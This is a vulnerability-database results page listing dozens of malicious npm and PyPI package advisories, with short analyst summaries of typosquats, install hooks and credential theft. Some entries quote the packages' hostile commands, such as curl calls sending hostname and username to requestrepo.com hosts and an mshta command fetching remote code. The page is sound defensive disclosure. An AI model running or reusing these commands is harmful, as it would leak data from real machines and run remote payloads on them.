Lucene search
K

226591 matches found

OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 10:18 p.m.5 views

Malicious code in syco1 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e43be65a0930b121cf4d610c70b2d07165e4d335dece4344590b471d078fa5b5 Package self-describes as a 'System binary configuration tool' but ships a covert screen and clipboard surveillance overlay. pointer.py captures...

6AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 10:18 p.m.7 views

Malicious code in syspo (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6f89c590b7c90182cb86bc3e45f71f2357003f4359b6e94818fc996951762f5c The package is published as a 'System binary configuration tool' but its actual behavior is a covert clipboard/screen-capture overlay. On invocation...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 10:18 p.m.5 views

Malicious code in sypoi1 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b22a9450e70ba1095097d2779ad6da01c111c37e940d890fbfc21d1aeb6a0f11 On require, index.js silently bootstraps a full Python runtime on the installer's machine — first via winget install -e --id Python.Python.3.12...

5.9AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 9:32 p.m.5 views

Malicious code in @kl-dolphin/jump (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 01bcfe49a6a65949559f89cc5019c6e9ec59a236183f7cb8d1906d1e3caccf7d Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 6:16 p.m.5 views

Malicious code in @kl-dolphin/swim (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 799f1e9f18de306eaf0e84079501a9b01d2d1d1085ac9f119fa8e047b43a90ac Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 6:5 p.m.5 views

Malicious code in zenith-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c29676376a28531b186e09fbf7e2d3a0697943ece764e0604ebbdd4b734ae094 Package name is zenith-utils but the tarball is a verbatim copy of the nodemailer source tree lib/nodemailer.js as main, lib/smtp-transport,...

6.4AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 4:27 p.m.5 views

Malicious code in python-dateutil2 (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 fbd1a31a38c7a6487545ce3e039371443c9ac80c7dc0ff9b22a46db6686244b2 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...

6AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 3:31 p.m.7 views

Malicious code in normalize-plus (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a8d9638f9c3f81ac15972cf2ff227b2d426a72c5e37035e54402648fe8120675 On import, normalize-plus's top-level initPlugin performs an HTTP GET against https://jsonkeeper.com/b/CI3HT, parses the JSON response, and evaluates...

6AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 2:43 p.m.5 views

Malicious code in ui-core-system (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 5354cae05d6dc20a942310d00c7ae19f0cef2e44c9922322a81a950fdd798c6b Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 2:8 p.m.8 views

Malicious code in ldapaotest (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware e6acf213c67fc31df0f21bf872b8c8592ebc5e5af55e79884a483fad6a7ad8c4 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 2:7 p.m.4 views

Malicious code in cccmyssr2 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bd052408bb36e56e940e50ba81f7054844bc91dc0b32eaead5d15ca67f9b5c03 On npm install, the package's postinstall.js executes curl "http://r1x55270.requestrepo.com/pre?h=$hostname&u=$whoami", transmitting the installer's...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 2:7 p.m.5 views

Malicious code in cccmyssr-util (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 99d23c8f1194f89f1b52e986cd57ca9c0fbd739a6565eb33c972f4fbaf0966e7 On npm install, the package's postinstall.js unconditionally executes exec'curl http://qvmjcw4s.requestrepo.com', sending an HTTP callback to a uniqu...

6.3AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 2:7 p.m.8 views

Malicious code in cccmyssr3 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a15e77975be346fa9b834e50124784a6774b5385e47072ae80911f5eda92cabf On npm install, this package automatically runs postinstall.js, which executes curl -X POST with a body containing the installer's hostname $hostname...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 2:6 p.m.4 views

Malicious code in react-campaign-optimizer (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a040ca9a32fe68e08906bdc58b7ae907b8f8092acd9764266de15004b3922e9f On npm install, the package runs node postinstall.js declared in package.json scripts.postinstall which performs unauthenticated, unconsented...

5.9AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 2:5 p.m.11 views

Malicious code in signup-embedder (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c48f398f700b78d1893db4570d5d6f16985d937ee79677aab97e673a1cf86e7e [email protected] ships preinstall.js and postinstall.js lifecycle scripts that auto-execute on npm install. preinstall.js collects...

5.8AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 2:4 p.m.6 views

Malicious code in chai-as-predicted (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector fd7a2ff71dd341d02986c8185ea9eb18196b782f0efd9103859c0493c9f4cc78 Package name 'chai-as-predicted' impersonates the popular 'chai-as-promised' assertion library, but ships unrelated code disguised as pino logger...

6.2AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 2:1 p.m.6 views

Malicious code in hs-locale-management (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1d717c264a1c338c3b3fee43c13e43eba24cafbdabf34f62108bbd99e05c6b1b Package targets the internal-sounding name 'hs-locale-management' on the public npm registry at an inflated version 99.99.99-poc3, the canonical...

6.3AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 10:23 a.m.6 views

Malicious code in multer-express (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware b2776e1ead8f0a089fc302abdc832c78c30a0add00952fb3071c904a3fcbc150 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 10:23 a.m.4 views

Malicious code in rapidsearch (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 523ca6ccaf1ecde4d8e9d093519fcea846342f3108a5dd4e5ab79ae65144167e Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 10:16 a.m.4 views

Malicious code in eth_accounts (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 7049409317d7ca15ed0af4f42194769b5383eaaa676af744d96f6c2158c7e676 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 10:16 a.m.4 views

Malicious code in vercel-api-client (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 098c831fa62673ea33d1d0459bb4b529b33801f3a26b6691e7c2cd6597723952 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 10:16 a.m.9 views

Malicious code in evmdotjs (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 2593392b2cb94ce2e63327e486ec5c1a2a738c76283c6b1958aa2b23a1cc7b0f Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 7:35 a.m.6 views

Malicious code in simplisafe-gatsby (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 564baff2e47527f159c52c527e1ea2b93d73625f94737f4397cff99311871a18 On npm install, the package's preinstall hook package.json declares "preinstall": "node index.js" executes index.js, which collects the installer's...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 7:21 a.m.6 views

Malicious code in macos-ci-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8f342b002e02396d7f82ee89e77140204c35b673411afd05bc1b3ca91c895a06 On first require of the package, index.js decodes a base64-encoded URL https://api.ingress-hub.com/cdn/assets/update.pkg and downloads the response t...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 7:21 a.m.6 views

Malicious code in linux-ci-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8b2c5010ed5043c947b561f4359869ec7c0f6cdf219d0b2aa35c039e36812a01 On require, index.js performs a Linux platform check, then decodes a base64-obfuscated URL https://api.ingress-hub.com/cdn/assets/update.pkg and...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 6:58 a.m.6 views

Malicious code in system-core-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0a1d575b5be4daa71ffea6c37e5990b0396f864234cb5f0488c11332cdd7e4d3 On require/import, src/index.js shell-executes a hidden PowerShell one-liner that downloads launcher.bat from an anonymous Cloudflare R2 bucket...

6AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 6:41 a.m.7 views

Malicious code in gunicorm (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c97ab7b686dad57c3e1ffd4b86d6a75470164ed15ceedc2b26a4847fb2a331ab Package name gunicorm is a single-character edit of the widely-used gunicorn WSGI server and ships no functional code beyond setup.py. setup.py...

6AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 6:41 a.m.5 views

Malicious code in ditenv (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f0a52dbba9abeff2c606bcbc862027da259fcbd3938c827abfdbdb06ba801ecb setup.py overrides the install and egginfo commands with a RunCommand class that fires unconditionally on pip install or pip download. The override...

6.2AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 6:40 a.m.7 views

Malicious code in fkaks (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e44e1f1158eda01d3f18e3a3c01e30ebc9f8f92780ea532a63cf6ed31d8a25d3 fkaks 0.0.1 ships a setup.py that overrides the install and egginfo commands so that any pip install or pip download of the package unconditionally...

6.5AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 6:39 a.m.7 views

Malicious code in mcpsever (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 087fec121d53b905e66a2c368e905de51bc7aa3863f0777589a18d45623d3515 During installation, the package exfiltrates env variables --- Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers. Campaign:...

6AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 6:26 a.m.9 views

Malicious code in bn-lint (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c14057d91b2283926b2b0c1093a66db17c40efbd0ceb21c29b0bdbfa79736da5 Package is published as 'bn-lint' but ships a verbatim copy of MikeMcl/big.js README, source, version banner v7.0.1, and repo URL all identify as...

5.9AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 6:16 a.m.6 views

Malicious code in evil-pkg (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bf5806c778f7f49aba80d58a718ed64b09e714e34caa649874727cda5ed92831 package.json declares "bin": "node": "./shim.js" , which causes npm to place a node symlink inside nodemodules/.bin/. Because npm prepends...

6.1AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 6:2 a.m.6 views

Malicious code in gpt-chat-cli (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e8890af695b137878736a36dae473487015eb1954c494fec0b5a6041f0817832 collect.js bundles a host-reconnaissance and exfiltration payload. It loads childprocess, fs, os, http, and https, reads os.hostname and os.homedir,...

6AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 4:13 a.m.6 views

Malicious code in hardhat-test-log (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 741350b4472a82c53151793b413166a5fad36af3d2d14fa1d12afba9eccb9fed Package impersonates the well-known eth-gas-reporter / hardhat-gas-reporter packages: README is titled 'eth-test-log', copies badges and contributor...

6.4AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 4:7 a.m.8 views

Malicious code in dbt-language-server (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b15387169de77b4c18baf8c3f4d27156085bd06d96d0a27879545c3f0358dba8 package.json declares a preinstall hook node index.js that runs automatically on npm install. index.js collects installer-side reconnaissance data —...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 4:0 a.m.5 views

Malicious code in hyperpure (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 96c5552a039e4d845c30fae8f2c376eed21309d6b5298193850594fe4b1854d0 On npm install, the preinstall lifecycle script in package.json runs curl to POST the installer's hostname hostname -f, current user whoami, working...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 3:59 a.m.7 views

Malicious code in decimal-format-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 864677541e3090100ca588a37d8eb525f74817ade2fce5cb3e265af45b0c4e9a The postinstall script scripts/sync-peer.cjs runs npm pack [email protected] or whatever version is configured via...

6.6AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 3:58 a.m.10 views

Malicious code in rollup-runtime-polyfill-core (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e1923adcd8dc53c5f68d2b6f1ef453f5dc52a71fcb2b9e9db502d308e5ef4311 Package name rollup-runtime-polyfill-core impersonates the legitimate rollup-plugin-polyfill-node and even copies that project's GitHub URL into its...

6.1AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 3:50 a.m.5 views

Malicious code in assertcore (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4bd2844909a6dd6db77af2d47b2d9a16ff126d892998282f4df4c7ed1f61a4af Package assertcore impersonates the popular chai assertion library ships a copy of chai source as cover; author and homepage differ from the genuine...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 3:36 a.m.6 views

Malicious code in backpack-ios (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 25f0d7ea98cef4ddcac8af3b854c37c1a8a3246a13357af60cb36589454657b5 package.json declares "preinstall": "node index.js", causing index.js to execute automatically on npm install. The script collects host identifiers...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 3:36 a.m.18 views

Malicious code in llm-traces-app (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c0916c8694f396dfa0947df6e3b3d3966839a6e02d4a4f5b84f698787c446bdc On npm install, the package's preinstall lifecycle hook runs node index.js, which collects host identity os.hostname, os.userInfo, homedir, DNS...

6AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 3:36 a.m.6 views

Malicious code in twilio-voice-js-reference-components (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a3a57b06daad43c269fe3846083da2fdce277fd1ff3a9399533072f6e894afc2 Package impersonates the Twilio Voice JS SDK namespace and ships a single exfiltration payload. package.json declares "preinstall": "node index.js",...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 2:56 a.m.6 views

Malicious code in openllmapi (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9df5662b44b20595801c25919ac14689b71e89b8c1bdacceedc7ba1e9cf75c41 The package's preinstall lifecycle script preinstall.js line 3 runs cmd /c "mshta http://fixars.top", which causes Windows mshta.exe to download and...

6.5AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 2:49 a.m.6 views

Malicious code in monty-data (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1d234eb20e94a8d34b23f4aed0a562eb1c038ce5bd603856546c970152a70ac5 On npm install, the package's postinstall hook package.json declares "postinstall": "node bin/cli.js" automatically runs a data-collection CLI withou...

6AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 2:37 a.m.7 views

Malicious code in npmkekw (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 74384b76540c8d36fef8a30dc2acd3224defeaa8a58d0155101f2f670aa8b153 The package's main module index.js exports an init function that spawns /bin/bash via childprocess.exec and opens a TCP socket to the hardcoded remot...

6.1AI score
Exploits0References4
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 1:53 a.m.6 views

Malicious code in tailwind-textform-fill (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware c56e75021e442e7d3b83168a30f734d2b3c5d636c558d7e6da2e159b11674bfa Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 1:51 a.m.20 views

Malicious code in html-to-gutenberg (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 6381496c1a275836b5d3c11ca7f141ad32f84b5263450bf5cb3c9a91289dcd1d Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 1:44 a.m.8 views

Malicious code in fetch-page-assets (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware fd48ae20edf27366ea94c51e236b2dc615d3f7a8a952f414710d6e057a73b015 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 1:17 a.m.9 views

Malicious code in vscode-test-web (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 03b4e34481aa5333960c4932e8db454ab39451cf19c9372e7373886e0a6f7513 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/23 10:26 p.m.7 views

Malicious code in delta-time-32bb (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bcbd5b3b8f7702c8cf59c094e98f078f68563d407235bce1dd0ec6e6522fe03b Package declares a postinstall hook "postinstall": "node run.js" in package.json that executes run.js automatically on npm install. run.js imports os...

5.8AI score
Exploits0References1
Total number of security vulnerabilities226591